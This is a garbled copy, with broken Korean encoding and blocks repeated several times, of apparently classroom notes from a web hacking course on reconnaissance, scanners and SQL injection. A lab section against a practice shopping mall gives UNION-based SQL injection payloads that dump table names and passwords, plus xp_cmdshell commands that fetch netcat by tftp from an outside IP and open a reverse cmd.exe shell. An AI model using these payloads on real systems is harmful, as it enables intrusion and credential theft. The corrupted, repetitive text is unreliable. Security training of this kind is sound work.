์„ธ์…˜ID์ƒ์„ฑ ์ทจ์•ฝ์  ๋ถ„์„

๊ณต๊ฒฉ

์ •๋ณด์— ๊ทบ๊ฑฐํ•š ๊ณต๊ฒฉ

๋ฌด์ž‘์œ„ ๊ณต๊ฒฉ

์‚ฌ์ ‚๊ณต๊ฒฉ

๊ณต๊ฒฉ์ดˆ์ 

์ˆ˜์ง‘๋œ ACCOUNT ์ •๋ณด๋ฅผ์ด์šฉ

OSNETWORK SERVICE ๊ณต๊ฒฉ

WEBSERVER WEBAPP SERVER WEBAPPLICATION

SQLISCANNER

๊ถŒํ•š ์ƒ์Šน

์ˆ˜ํ‰

ํšŒ์›์ •๋ณด ์ˆ˜์ •

Cookie Stealing

CSRF

์ˆ˜์ง

CSRF

CSRF๋ฅผ ํ†ตํ•ด DMZ์˜์—ญ์— ์ ‘์†ํ•š ๊ด€๋ฆฌ์ž์—๊ฒŒ ๋‚ด๋ถ€ ZONE์ชฝ์œผ๋กœ ๊ฐ•์ œ REQEUST๋ฅผ ํ•˜๋„๋ก ์กฐ์ž‘ ๊ฐ€๋Šฅ

kisec ์›นํ•ดํ‚น ๋…ธํŠธํ•„๊ธฐ ํŽ˜์ด์ง€ 13

์ ‚์ œ์กฐ๊ฑด์€ ๋‚ด๋ถ€๋ง์˜ IP APPLICATION PARAMETERS ๋ฅผ ๋ชจ๋‘ ์•Œ๊ณ  ์žˆ์„ ๊ฒฝ์šฐ

CSRF๋ฅผ ํ†ตํ•ด DMZ์˜์—ญ์— ์ ‘์†ํ•š ๊ด€๋ฆฌ์ž์—๊ฒŒ ๋‚ด๋ถ€ ZONE์ชฝ์œผ๋กœ ๊ฐ•์ œ REQEUST๋ฅผ ํ•˜๋„๋ก ์กฐ์ž‘ ๊ฐ€๋Šฅ

OWASPWASC

์ˆ˜์ž‘์—…

์›น ์–ดํ”Œ๋ฆฌ์ผ€์ด์…˜ ์ทจ์•ฝ์  ๊ณต๊ฒฉ

์œ„ํ—˜๋„์— ๋”ฐ๋ผ ๊ณต๊ฒฉ

๊ฐ€์šฉ์„ฑ์„ ๋–จ์–ดํŠธ๋ฆฌ๋Š” ๊ณต๊ฒฉ์ œ์™ธ

์„œ๋ฒ„์˜ shellํš๋“ or๊ด€๋ฆฌ์ž ์•”ํ˜ธ ํš๋“

๋ฐ์ดํ„ฐ ์—ด๋žŒ ํ—ˆ์šฉ๊ธˆ์ง€

Ethical Hacking์ธ ๊ฒฝ์šฐ ๊ณ ๊ฐ์˜ ์š”๊ตฌ์‚ฌํ•ญ ๋ฐ˜์˜

์˜คํƒ์ œ๊ฑฐ

์›น ์ทจ์•ฝ์  ์Šค์บ๋„ˆ ๊ฒฐ๊ณผ ๋ถ„์„

ONE WAY WEB HACKING ์ฝ์–ด๋ณด๊ธฐ

kisec ์›นํ•ดํ‚น ๋…ธํŠธํ•„๊ธฐ ํŽ˜์ด์ง€ 14

SQL INJECTION

GETPOST ํŒŒ๋ผ๋ฏธํ„ฐ HTTP REQUEST ํŒŒ๋ผ๋ฏธํ„ฐ ์ฟ ํ‚ค ๊ฐ’

๊ธฐํƒ€ ์„œ๋ฒ„์—์„œ ์ฒ˜๋ฆฌํ•˜๋Š” ๋ชจ๋“ž ํด๋ผ์ด์–ถํŠธ ๊ฐ’

ํด๋ผ์ด์–ถํŠธ ์ž…๋ ฅ ๊ฐ’ ์œ ํ˜•

ํด๋ผ์ด์–ถํŠธ์—์„œ ์ž…๋ ฅ๋œ ๊ฐ’์ด ์œ ํšจ์„ฑ ๊ฒ€์ฆ๊ณผ์ • ์—†์ด sql ๋ฌธ์— ํฌํ•จ๋˜๋Š” ๊ฒฝ์šฐ

MAIN CAUSE

Impact

์ธ์ฆ์šฐํšŒ

๋ฐ์ดํ„ฐ๋ฒ ์ด์Šค ๋คํ”„ ์กฐ์ž‘ ์ƒ์„ฑ ํŒŒ๊ดด

DML D์ด ๋“ฑ ์ƒ์ƒํ•› ์ˆ˜ ์žˆ๋Š” ๋ชจ๋“ž ์ž‘์—…

๋ฐ์ดํ„ฐ๋ฒ ์ด์Šค ์ปจํŠธ๋กค

์‹œ์Šคํ…œ ๋ช…๋ น์–ด ์‹คํ–‰

COUNTERMEASURE

์ž…๋ ฅ๊ฐ’ ๊ฒ€์ฆ

์ตœ์†Œ๊ถŒํ•š ๋ถ€์—ฌ(SYSTEMDBMSDatabase)

์ธ์ฆ์šฐํšŒ

์ธ๊ฐ€๋œ ์‚ฌ์šฉ์ž์˜ ID PW ๋ฅผ ์ž…๋ ฅํ•˜์ง€ ์•Š๊ณ ๋„ ์ธ์ฆ์„ ์šฐํšŒํ•˜๋Š” ํ–‰์œ„

ID PW๋ฅผ ๋ชจ๋ฅด๋Š” ์ƒํƒœ์—์„œ๋„ ์ ์ ƒํžˆ ๊ตฌ์„ฑ๋œ ๋ฌธ์ž์—ด์„ ์ž…๋ ฅํ•˜์—ฌ ์ธ์ฆ์„ ์šฐํšŒํ•˜๋Š” ๊ฒƒ์ด ๊ฐ€๋Šฅ

์ž…๋ ฅ๋œ ๋ฌธ์ž์—ด์€ SQL ๋ฌธ์˜ ์ผ๋ถ€๋กœ ์‚ฝ์ž…์ด ๋˜์–ด ์‹คํ–‰๋จ

์ธ์ฆ ์šฐํšŒ์— ์‚ฌ์šฉ๋˜๋Š” ์ž…๋ ฅ๊ฐ’์€

๋ฌธ๋ฒ•์ƒ ์˜ค๋ฅ˜๋ฅผ ์‹œํ‚ค์ง€ ์•Š์•„์•ผ ํ•จ

WHERE์ ƒ์˜ ์กฐ๊ฑด์ด ํ•ญ์ƒ ์ฐธ์ด ๋˜๋„๋ก ์กฐ์ž‘

์›น ์• ํ”Œ๋ฆฌ์ผ€์ด์…˜์˜ ์ผ๋ฐ˜์ ์ธ ์ธ์ฆ ์ ƒ์ฐจ

1IDPW ์ž…๋ ฅ

2SQL Query ์ƒ์„ฑ

3DATABASE์— ์ฟผ๋ฆฌ ์ ‚์†ก

4DATABASE์—์„œ ์ฟผ๋ฆฌ๋ฌธ ์‹คํ–‰

5๋ฐ˜ํ™˜๋˜๋Š” RETURN๊ฐ’์— ๋”ฐ๋ผ ์ธ์ฆ์—ฌ๋ถ€ํŒ๋‹จ

SQL INJECTION ์ ƒ์ฐจ

DB ์Šคํ‚ค๋งˆํŒŒ์•… (DBTABLECOLUMN ํ™˜๊ฒฝ์ •๋ณด๋“ฑ ํŒŒ์•…

๋ฐ์ดํ„ฐ๋ฒ ์ด์Šค ์ด๋ฆ„ ํŒŒ์•…

ํ…Œ์ด๋ธ”์ด๋ฆ„ ํŒŒ์•…

์ปฌ๋Ÿผ์ด๋ฆ„ ํŒŒ์•…

๋ชจ๋“ž SQL INJECTION์€ ์ž…๋ ฅ๊ฐ’์— ๋Œ€ํ•š ์œ ํšจ์„ฑ ๊ฒ€์ฆ์„ ํ•˜์ง€ ์•Š๊ธฐ ๋•Œ๋ฌธ์— ๋ฐœ์ƒํ•š๋‹ค ์—๋Ÿฌ๋ฅผ ์œ ๋„ํ•˜์—ฌ ํ•„๋“œ์˜ ์ •๋ณด๋ฅผ ๋ˆ„์ถœ์‹œํ‚จ๋‹ค

DBMS ๊ฐ€ ์ ์ ƒํ•š ๊ถŒํ•š์„ ๊ฐ€์ง€๊ณ  ์žˆ๋Š” ๊ฒฝ์šฐ ๋ ˆ์ง€์ŠคํŠธ๋ฆฌ์— ์ ‘๊ทบํ•˜๋Š” ๊ฒƒ์ด ๊ฐ€๋Šฅ

DBMS๊ฐ€ ์ ์ ƒํ•š ๊ถŒํ•š์„ ๊ฐ€์ง€๊ณ  ์žˆ๋Š” ๊ฒฝ์šฐ ์ฟผ๋ฆฌ๋ฅผ ํ†ตํ•š ์„œ๋น„์Šค ์ œ์–ด๊ฐ€ ๊ฐ€๋Šฅ

OYES MALL (SQL INJECTION์„ ์ด์šฉํ•š ๊ด€๋ฆฌ์ž ๊ถŒํ•š ํš๋“ ์‹ค์Šต

ํ™˜๊ฒฝ์€(2000ASPMS-SQL2000)

์ค€๋น„๋œ ์‡ผํ•‘๋ชฐ์ด๋‹ค

์ฒซ๋ฒˆ์งธ ๋ฐฉ๋ฒ•

Web Hacking 3์ผ์ฐจ

2007๋…„ 10์›” 25์ผ ๋ชฉ์š”์ผ

์˜ค์ ‚ 1200

kisec ์›นํ•ดํ‚น ๋…ธํŠธํ•„๊ธฐ ํŽ˜์ด์ง€ 15

group by(user_id) -- ๋ฅผ ์ด์šฉํ•ด ํ…Œ์ด๋ธ”์„ ์•Œ์•„๋‚ธ๋‹ค

Member ํ…Œ์ด๋ธ”์•†์—์žˆ๋Š” num์ด๋ผ๋Š” ์ปฌ๋Ÿผ์„ ํ† ํ•ด๋ƒˆ๋‹ค

kisec ์›นํ•ดํ‚น ๋…ธํŠธํ•„๊ธฐ ํŽ˜์ด์ง€ 16

union select from members where user_id like o ํ•ด๋ด๋ผ ๋กœ๊ทธ์ธ ๋ ๊ฑฐ๋‹ค

๋‘๋ฒˆ์งธ ๋ฐฉ๋ฒ•

์ฃผ์†Œ๋ก์กฐํšŒ ๋ถ€๋ถ„์— SQL INJECTION์„ ํ•˜์˜€๋‹ค

$UNION SELECT 1234TABLE_NAME FROM INFORMATION_SCHEMATABLES-- ์™€๊ฐ™์ด ์งˆ์˜๋ฅผ ํ•˜๋ฉด ํ† ํ•ด๋‚ธ๋‹ค

kisec ์›นํ•ดํ‚น ๋…ธํŠธํ•„๊ธฐ ํŽ˜์ด์ง€ 17

์šฐ๋ฆฌ๋Š” members ๋ผ๋Š” ํ…Œ์ด๋ธ”์ด ์กด์žฌํ•˜๋Š” ๊ฒƒ์„ ๋ณผ์ˆ˜ ์žˆ์„ ๊ฒƒ์ด๋‹ค

$UNION SELECT 1234 COLUMN_NAME FROM INFORMATION_SCHEMACOLUMNS WHERE TABLE_NAME= members --

Members์— ๋Œ€ํ•š ์ปฌ๋Ÿผ์„ ํ† ํ•ด๋‚ธ๋‹ค

$ or 1=(select top 1 user_id from members)--

User id์˜ ์ปฌ๋Ÿผ์— top 1 ์ธ๊ฒƒ์„ ํ† ํ•ด๋‚ธ๋‹ค

union select 1234 user_idpasswd from members where user_id=oyes --

kisec ์›นํ•ดํ‚น ๋…ธํŠธํ•„๊ธฐ ํŽ˜์ด์ง€ 18

์œผ์•„~password ๊ฐ€ oyesmall ์ด๋ผ๋„ค ์‹ค์Šต ๋

File Uploading

$$ exec masterxp_cmdshell tftp -i 2112406869 get ncexe nc2000exe --

$$ exec masterxp_cmdshell nc1000exe 2112406877 7777 -e cmdexe --

์•„์ฃผ ๊ฐ„๋‹จํ•˜๋‹ค

$$ exec masterxp_cmdshell tftp -i 2112406869 get ncexe nc6249exe ampamp nc -e cmdexe 2112406877 6249 --

kisec ์›นํ•ดํ‚น ๋…ธํŠธํ•„๊ธฐ ํŽ˜์ด์ง€ 19

-grepegrep awksedsortuniq(moreheadless)๋“ฑ ํ™œ์šฉ

Mirroring ํ›„ ์ •์  ๋ถ„์„

balckwindow

InteliTamper

Wikto

Web๊ตฌ์กฐ ๋ถ„์„(๋ฐ˜์ž๋™)

Httpwatch

TamperlE

Cooxie

LiveHttpHeaders(firefox)

Command line tool(nccurlopenssl)

Manual Analysis

ParosWebscrabFidderBurpIntruder

SoftwareProxy

Web๊ตฌ์กฐ๋ถ„์„(์ˆ˜์ž‘์—…)

๊ด€๋ฆฌ์žํŽ˜์ด์ง€

์ž๋ฃŒ์‹ค(web shell)

ํ†ต๊ณ„ ์ƒํƒœ ํŽ˜์ด์ง€

ํšŒ์›๋“ฑ๋ก์šฐํŽธ๋ฒˆํ˜ธ ์กฐํšŒ(์ธ์ ์…˜๊ณต๊ฒฉ)

(์ธ์ ์…˜์€ ์ž…๋ ฅ๊ฐ’์„ ๋„ฃ์—ˆ์„๋•Œ ๊ฒฐ๊ณผ๋ฅผ ๋ฟŒ๋ ค์ฃผ๋Š” ํŽ˜์ด์ง€๋ฅผ ์ฐพ์•„์•ผํ•š๋‹ค)์•†๋ณด์—ฌ์ฃผ๋Š”๊ฑด ๋ธ”๋ผ์ธ๋“œ ์ธ์ ์…˜

์•”ํ˜ธ๋ถ„์‹ค(์•”ํ˜ธ ํš๋“ ์ˆ˜์›”)

์ •๋ณด์ˆ˜์ •(์ˆ˜ํ‰์ˆ˜์ง์ƒ์Šน๊ธฐํšŒ)

ํšŒ์›๊ฐ€์ž…ํŽ˜์ด์ง€

๊ฒฐ์ œ ํŽ˜์ด์ง€

Basic Banner Garbbing

Http resonse ํ—ค๋” ์ˆš์„œ

Http resonse ํ—ค๋” ์กด์žฌ ์œ ๋ฌด

Http resonse ํ—ค๋”์˜ ํŠน์ • ๊ฐ’

Tracehead ๋“ฑ์— ๋Œ€ํ•š ์ƒ์ดํ•š ์‘๋‹ต

๋ฐ์ดํ„ฐ์—†์ด ์ ‚์†กํ•š put์— ๋Œ€ํ•š์‘๋‹ต

kisec ์›นํ•ดํ‚น ๋…ธํŠธํ•„๊ธฐ ํŽ˜์ด์ง€ 12

Tracehead ๋“ฑ์— ๋Œ€ํ•š ์ƒ์ดํ•š ์‘๋‹ต

๋ฐ์ดํ„ฐ์—†์ด ์ ‚์†กํ•š put์— ๋Œ€ํ•š์‘๋‹ต

Unexpercted Method ์ ‚์†ก

๋™์ผ์š”์ฒญ ๋ฐ˜๋ณต ์ ‚์†ก

์ทจ์•ฝ์  ์Šค์บ”(system)

Xscan

Nessus

n-stealth security scanner

์ทจ์•ฝ์  ์Šค์บ”(Web Server amp WAS amp Web App)

APP SCANNER

ACUNETIX

NSTALKER SCANNER

์Šค์บ” ISSUE

BASIC DIGEST NTML CERT

FORM-BASED

์ธ์ฆ์ •๋ณด ์„ค์ •

์Šค์บ” ๊ฐ•๋„(๋ฉ€ํ‹ฐ ์ปค๋„ฅ์…˜ ํƒ€์ž„์•„์›ƒ ๊ณต๊ฒฉ๋ชจ๋“œ๋น„๊ณต๊ฒฉ๋ชจ๋“œ)

๋ถ„์„

์˜๋ฏธ์žˆ๋Š” ์ •๋ณด๋กœ ๊ฐ€๊ณต

ACCOUNT ์ˆ˜์ง‘

OS์ •๋ณด์— ๋”ฐ๋ฅธ ์ทจ์•ฝ์  ์ˆ˜์ง‘

ํฌํŠธ๋ณ„ ์„œ๋น„์Šค ์ทจ์•ฝ์ 

์›น์„œ๋ฒ„ ์ ‚์ฒด๊ตฌ์กฐ ๋ถ„์„

์ฃผ์„

ํžˆ๋“ž ํ•„๋“œ

์†Œ์Šค๋ถ„์„

์ฟ ํ‚ค๋ถ„์„

์„ธ์…˜ID์ƒ์„ฑ ์ทจ์•ฝ์  ๋ถ„์„

๊ณต๊ฒฉ

์ •๋ณด์— ๊ทบ๊ฑฐํ•š ๊ณต๊ฒฉ

๋ฌด์ž‘์œ„ ๊ณต๊ฒฉ

์‚ฌ์ ‚๊ณต๊ฒฉ

๊ณต๊ฒฉ์ดˆ์ 

์ˆ˜์ง‘๋œ ACCOUNT ์ •๋ณด๋ฅผ์ด์šฉ

OSNETWORK SERVICE ๊ณต๊ฒฉ

WEBSERVER WEBAPP SERVER WEBAPPLICATION

SQLISCANNER

๊ถŒํ•š ์ƒ์Šน

์ˆ˜ํ‰

ํšŒ์›์ •๋ณด ์ˆ˜์ •

Cookie Stealing

CSRF

์ˆ˜์ง

CSRF

CSRF๋ฅผ ํ†ตํ•ด DMZ์˜์—ญ์— ์ ‘์†ํ•š ๊ด€๋ฆฌ์ž์—๊ฒŒ ๋‚ด๋ถ€ ZONE์ชฝ์œผ๋กœ ๊ฐ•์ œ REQEUST๋ฅผ ํ•˜๋„๋ก ์กฐ์ž‘ ๊ฐ€๋Šฅ

kisec ์›นํ•ดํ‚น ๋…ธํŠธํ•„๊ธฐ ํŽ˜์ด์ง€ 13

์ ‚์ œ์กฐ๊ฑด์€ ๋‚ด๋ถ€๋ง์˜ IP APPLICATION PARAMETERS ๋ฅผ ๋ชจ๋‘ ์•Œ๊ณ  ์žˆ์„ ๊ฒฝ์šฐ

CSRF๋ฅผ ํ†ตํ•ด DMZ์˜์—ญ์— ์ ‘์†ํ•š ๊ด€๋ฆฌ์ž์—๊ฒŒ ๋‚ด๋ถ€ ZONE์ชฝ์œผ๋กœ ๊ฐ•์ œ REQEUST๋ฅผ ํ•˜๋„๋ก ์กฐ์ž‘ ๊ฐ€๋Šฅ

OWASPWASC

์ˆ˜์ž‘์—…

์›น ์–ดํ”Œ๋ฆฌ์ผ€์ด์…˜ ์ทจ์•ฝ์  ๊ณต๊ฒฉ

์œ„ํ—˜๋„์— ๋”ฐ๋ผ ๊ณต๊ฒฉ

๊ฐ€์šฉ์„ฑ์„ ๋–จ์–ดํŠธ๋ฆฌ๋Š” ๊ณต๊ฒฉ์ œ์™ธ

์„œ๋ฒ„์˜ shellํš๋“ or๊ด€๋ฆฌ์ž ์•”ํ˜ธ ํš๋“

๋ฐ์ดํ„ฐ ์—ด๋žŒ ํ—ˆ์šฉ๊ธˆ์ง€

Ethical Hacking์ธ ๊ฒฝ์šฐ ๊ณ ๊ฐ์˜ ์š”๊ตฌ์‚ฌํ•ญ ๋ฐ˜์˜

์˜คํƒ์ œ๊ฑฐ

์›น ์ทจ์•ฝ์  ์Šค์บ๋„ˆ ๊ฒฐ๊ณผ ๋ถ„์„

ONE WAY WEB HACKING ์ฝ์–ด๋ณด๊ธฐ

kisec ์›นํ•ดํ‚น ๋…ธํŠธํ•„๊ธฐ ํŽ˜์ด์ง€ 14

SQL INJECTION

GETPOST ํŒŒ๋ผ๋ฏธํ„ฐ HTTP REQUEST ํŒŒ๋ผ๋ฏธํ„ฐ ์ฟ ํ‚ค ๊ฐ’

๊ธฐํƒ€ ์„œ๋ฒ„์—์„œ ์ฒ˜๋ฆฌํ•˜๋Š” ๋ชจ๋“ž ํด๋ผ์ด์–ถํŠธ ๊ฐ’

ํด๋ผ์ด์–ถํŠธ ์ž…๋ ฅ ๊ฐ’ ์œ ํ˜•

ํด๋ผ์ด์–ถํŠธ์—์„œ ์ž…๋ ฅ๋œ ๊ฐ’์ด ์œ ํšจ์„ฑ ๊ฒ€์ฆ๊ณผ์ • ์—†์ด sql ๋ฌธ์— ํฌํ•จ๋˜๋Š” ๊ฒฝ์šฐ

MAIN CAUSE

Impact

์ธ์ฆ์šฐํšŒ

๋ฐ์ดํ„ฐ๋ฒ ์ด์Šค ๋คํ”„ ์กฐ์ž‘ ์ƒ์„ฑ ํŒŒ๊ดด

DML D์ด ๋“ฑ ์ƒ์ƒํ•› ์ˆ˜ ์žˆ๋Š” ๋ชจ๋“ž ์ž‘์—…

๋ฐ์ดํ„ฐ๋ฒ ์ด์Šค ์ปจํŠธ๋กค

์‹œ์Šคํ…œ ๋ช…๋ น์–ด ์‹คํ–‰

COUNTERMEASURE

์ž…๋ ฅ๊ฐ’ ๊ฒ€์ฆ

์ตœ์†Œ๊ถŒํ•š ๋ถ€์—ฌ(SYSTEMDBMSDatabase)

์ธ์ฆ์šฐํšŒ

์ธ๊ฐ€๋œ ์‚ฌ์šฉ์ž์˜ ID PW ๋ฅผ ์ž…๋ ฅํ•˜์ง€ ์•Š๊ณ ๋„ ์ธ์ฆ์„ ์šฐํšŒํ•˜๋Š” ํ–‰์œ„

ID PW๋ฅผ ๋ชจ๋ฅด๋Š” ์ƒํƒœ์—์„œ๋„ ์ ์ ƒํžˆ ๊ตฌ์„ฑ๋œ ๋ฌธ์ž์—ด์„ ์ž…๋ ฅํ•˜์—ฌ ์ธ์ฆ์„ ์šฐํšŒํ•˜๋Š” ๊ฒƒ์ด ๊ฐ€๋Šฅ

์ž…๋ ฅ๋œ ๋ฌธ์ž์—ด์€ SQL ๋ฌธ์˜ ์ผ๋ถ€๋กœ ์‚ฝ์ž…์ด ๋˜์–ด ์‹คํ–‰๋จ

์ธ์ฆ ์šฐํšŒ์— ์‚ฌ์šฉ๋˜๋Š” ์ž…๋ ฅ๊ฐ’์€

๋ฌธ๋ฒ•์ƒ ์˜ค๋ฅ˜๋ฅผ ์‹œํ‚ค์ง€ ์•Š์•„์•ผ ํ•จ

WHERE์ ƒ์˜ ์กฐ๊ฑด์ด ํ•ญ์ƒ ์ฐธ์ด ๋˜๋„๋ก ์กฐ์ž‘

์›น ์• ํ”Œ๋ฆฌ์ผ€์ด์…˜์˜ ์ผ๋ฐ˜์ ์ธ ์ธ์ฆ ์ ƒ์ฐจ

1IDPW ์ž…๋ ฅ

2SQL Query ์ƒ์„ฑ

3DATABASE์— ์ฟผ๋ฆฌ ์ ‚์†ก

4DATABASE์—์„œ ์ฟผ๋ฆฌ๋ฌธ ์‹คํ–‰

5๋ฐ˜ํ™˜๋˜๋Š” RETURN๊ฐ’์— ๋”ฐ๋ผ ์ธ์ฆ์—ฌ๋ถ€ํŒ๋‹จ

SQL INJECTION ์ ƒ์ฐจ

DB ์Šคํ‚ค๋งˆํŒŒ์•… (DBTABLECOLUMN ํ™˜๊ฒฝ์ •๋ณด๋“ฑ ํŒŒ์•…

๋ฐ์ดํ„ฐ๋ฒ ์ด์Šค ์ด๋ฆ„ ํŒŒ์•…

ํ…Œ์ด๋ธ”์ด๋ฆ„ ํŒŒ์•…

์ปฌ๋Ÿผ์ด๋ฆ„ ํŒŒ์•…

๋ชจ๋“ž SQL INJECTION์€ ์ž…๋ ฅ๊ฐ’์— ๋Œ€ํ•š ์œ ํšจ์„ฑ ๊ฒ€์ฆ์„ ํ•˜์ง€ ์•Š๊ธฐ ๋•Œ๋ฌธ์— ๋ฐœ์ƒํ•š๋‹ค ์—๋Ÿฌ๋ฅผ ์œ ๋„ํ•˜์—ฌ ํ•„๋“œ์˜ ์ •๋ณด๋ฅผ ๋ˆ„์ถœ์‹œํ‚จ๋‹ค

DBMS ๊ฐ€ ์ ์ ƒํ•š ๊ถŒํ•š์„ ๊ฐ€์ง€๊ณ  ์žˆ๋Š” ๊ฒฝ์šฐ ๋ ˆ์ง€์ŠคํŠธ๋ฆฌ์— ์ ‘๊ทบํ•˜๋Š” ๊ฒƒ์ด ๊ฐ€๋Šฅ

DBMS๊ฐ€ ์ ์ ƒํ•š ๊ถŒํ•š์„ ๊ฐ€์ง€๊ณ  ์žˆ๋Š” ๊ฒฝ์šฐ ์ฟผ๋ฆฌ๋ฅผ ํ†ตํ•š ์„œ๋น„์Šค ์ œ์–ด๊ฐ€ ๊ฐ€๋Šฅ

OYES MALL (SQL INJECTION์„ ์ด์šฉํ•š ๊ด€๋ฆฌ์ž ๊ถŒํ•š ํš๋“ ์‹ค์Šต

ํ™˜๊ฒฝ์€(2000ASPMS-SQL2000)

์ค€๋น„๋œ ์‡ผํ•‘๋ชฐ์ด๋‹ค

์ฒซ๋ฒˆ์งธ ๋ฐฉ๋ฒ•

Web Hacking 3์ผ์ฐจ

2007๋…„ 10์›” 25์ผ ๋ชฉ์š”์ผ

์˜ค์ ‚ 1200

kisec ์›นํ•ดํ‚น ๋…ธํŠธํ•„๊ธฐ ํŽ˜์ด์ง€ 15

group by(user_id) -- ๋ฅผ ์ด์šฉํ•ด ํ…Œ์ด๋ธ”์„ ์•Œ์•„๋‚ธ๋‹ค

Member ํ…Œ์ด๋ธ”์•†์—์žˆ๋Š” num์ด๋ผ๋Š” ์ปฌ๋Ÿผ์„ ํ† ํ•ด๋ƒˆ๋‹ค

kisec ์›นํ•ดํ‚น ๋…ธํŠธํ•„๊ธฐ ํŽ˜์ด์ง€ 16

union select from members where user_id like o ํ•ด๋ด๋ผ ๋กœ๊ทธ์ธ ๋ ๊ฑฐ๋‹ค

๋‘๋ฒˆ์งธ ๋ฐฉ๋ฒ•

์ฃผ์†Œ๋ก์กฐํšŒ ๋ถ€๋ถ„์— SQL INJECTION์„ ํ•˜์˜€๋‹ค

$UNION SELECT 1234TABLE_NAME FROM INFORMATION_SCHEMATABLES-- ์™€๊ฐ™์ด ์งˆ์˜๋ฅผ ํ•˜๋ฉด ํ† ํ•ด๋‚ธ๋‹ค

kisec ์›นํ•ดํ‚น ๋…ธํŠธํ•„๊ธฐ ํŽ˜์ด์ง€ 17

์šฐ๋ฆฌ๋Š” members ๋ผ๋Š” ํ…Œ์ด๋ธ”์ด ์กด์žฌํ•˜๋Š” ๊ฒƒ์„ ๋ณผ์ˆ˜ ์žˆ์„ ๊ฒƒ์ด๋‹ค

$UNION SELECT 1234 COLUMN_NAME FROM INFORMATION_SCHEMACOLUMNS WHERE TABLE_NAME= members --

Members์— ๋Œ€ํ•š ์ปฌ๋Ÿผ์„ ํ† ํ•ด๋‚ธ๋‹ค

$ or 1=(select top 1 user_id from members)--

User id์˜ ์ปฌ๋Ÿผ์— top 1 ์ธ๊ฒƒ์„ ํ† ํ•ด๋‚ธ๋‹ค

union select 1234 user_idpasswd from members where user_id=oyes --

kisec ์›นํ•ดํ‚น ๋…ธํŠธํ•„๊ธฐ ํŽ˜์ด์ง€ 18

์œผ์•„~password ๊ฐ€ oyesmall ์ด๋ผ๋„ค ์‹ค์Šต ๋

File Uploading

$$ exec masterxp_cmdshell tftp -i 2112406869 get ncexe nc2000exe --

$$ exec masterxp_cmdshell nc1000exe 2112406877 7777 -e cmdexe --

์•„์ฃผ ๊ฐ„๋‹จํ•˜๋‹ค

$$ exec masterxp_cmdshell tftp -i 2112406869 get ncexe nc6249exe ampamp nc -e cmdexe 2112406877 6249 --

kisec ์›นํ•ดํ‚น ๋…ธํŠธํ•„๊ธฐ ํŽ˜์ด์ง€ 19

Tracehead ๋“ฑ์— ๋Œ€ํ•š ์ƒ์ดํ•š ์‘๋‹ต

๋ฐ์ดํ„ฐ์—†์ด ์ ‚์†กํ•š put์— ๋Œ€ํ•š์‘๋‹ต

Unexpercted Method ์ ‚์†ก

๋™์ผ์š”์ฒญ ๋ฐ˜๋ณต ์ ‚์†ก

์ทจ์•ฝ์  ์Šค์บ”(system)

Xscan

Nessus

n-stealth security scanner

์ทจ์•ฝ์  ์Šค์บ”(Web Server amp WAS amp Web App)

APP SCANNER

ACUNETIX

NSTALKER SCANNER

์Šค์บ” ISSUE

BASIC DIGEST NTML CERT

FORM-BASED

์ธ์ฆ์ •๋ณด ์„ค์ •

์Šค์บ” ๊ฐ•๋„(๋ฉ€ํ‹ฐ ์ปค๋„ฅ์…˜ ํƒ€์ž„์•„์›ƒ ๊ณต๊ฒฉ๋ชจ๋“œ๋น„๊ณต๊ฒฉ๋ชจ๋“œ)

๋ถ„์„

์˜๋ฏธ์žˆ๋Š” ์ •๋ณด๋กœ ๊ฐ€๊ณต

ACCOUNT ์ˆ˜์ง‘

OS์ •๋ณด์— ๋”ฐ๋ฅธ ์ทจ์•ฝ์  ์ˆ˜์ง‘

ํฌํŠธ๋ณ„ ์„œ๋น„์Šค ์ทจ์•ฝ์ 

์›น์„œ๋ฒ„ ์ ‚์ฒด๊ตฌ์กฐ ๋ถ„์„

์ฃผ์„

ํžˆ๋“ž ํ•„๋“œ

์†Œ์Šค๋ถ„์„

์ฟ ํ‚ค๋ถ„์„

์„ธ์…˜ID์ƒ์„ฑ ์ทจ์•ฝ์  ๋ถ„์„

๊ณต๊ฒฉ

์ •๋ณด์— ๊ทบ๊ฑฐํ•š ๊ณต๊ฒฉ

๋ฌด์ž‘์œ„ ๊ณต๊ฒฉ

์‚ฌ์ ‚๊ณต๊ฒฉ

๊ณต๊ฒฉ์ดˆ์ 

์ˆ˜์ง‘๋œ ACCOUNT ์ •๋ณด๋ฅผ์ด์šฉ

OSNETWORK SERVICE ๊ณต๊ฒฉ

WEBSERVER WEBAPP SERVER WEBAPPLICATION

SQLISCANNER

๊ถŒํ•š ์ƒ์Šน

์ˆ˜ํ‰

ํšŒ์›์ •๋ณด ์ˆ˜์ •

Cookie Stealing

CSRF

์ˆ˜์ง

CSRF

CSRF๋ฅผ ํ†ตํ•ด DMZ์˜์—ญ์— ์ ‘์†ํ•š ๊ด€๋ฆฌ์ž์—๊ฒŒ ๋‚ด๋ถ€ ZONE์ชฝ์œผ๋กœ ๊ฐ•์ œ REQEUST๋ฅผ ํ•˜๋„๋ก ์กฐ์ž‘ ๊ฐ€๋Šฅ

kisec ์›นํ•ดํ‚น ๋…ธํŠธํ•„๊ธฐ ํŽ˜์ด์ง€ 13

์ ‚์ œ์กฐ๊ฑด์€ ๋‚ด๋ถ€๋ง์˜ IP APPLICATION PARAMETERS ๋ฅผ ๋ชจ๋‘ ์•Œ๊ณ  ์žˆ์„ ๊ฒฝ์šฐ

CSRF๋ฅผ ํ†ตํ•ด DMZ์˜์—ญ์— ์ ‘์†ํ•š ๊ด€๋ฆฌ์ž์—๊ฒŒ ๋‚ด๋ถ€ ZONE์ชฝ์œผ๋กœ ๊ฐ•์ œ REQEUST๋ฅผ ํ•˜๋„๋ก ์กฐ์ž‘ ๊ฐ€๋Šฅ

OWASPWASC

์ˆ˜์ž‘์—…

์›น ์–ดํ”Œ๋ฆฌ์ผ€์ด์…˜ ์ทจ์•ฝ์  ๊ณต๊ฒฉ

์œ„ํ—˜๋„์— ๋”ฐ๋ผ ๊ณต๊ฒฉ

๊ฐ€์šฉ์„ฑ์„ ๋–จ์–ดํŠธ๋ฆฌ๋Š” ๊ณต๊ฒฉ์ œ์™ธ

์„œ๋ฒ„์˜ shellํš๋“ or๊ด€๋ฆฌ์ž ์•”ํ˜ธ ํš๋“

๋ฐ์ดํ„ฐ ์—ด๋žŒ ํ—ˆ์šฉ๊ธˆ์ง€

Ethical Hacking์ธ ๊ฒฝ์šฐ ๊ณ ๊ฐ์˜ ์š”๊ตฌ์‚ฌํ•ญ ๋ฐ˜์˜

์˜คํƒ์ œ๊ฑฐ

์›น ์ทจ์•ฝ์  ์Šค์บ๋„ˆ ๊ฒฐ๊ณผ ๋ถ„์„

ONE WAY WEB HACKING ์ฝ์–ด๋ณด๊ธฐ

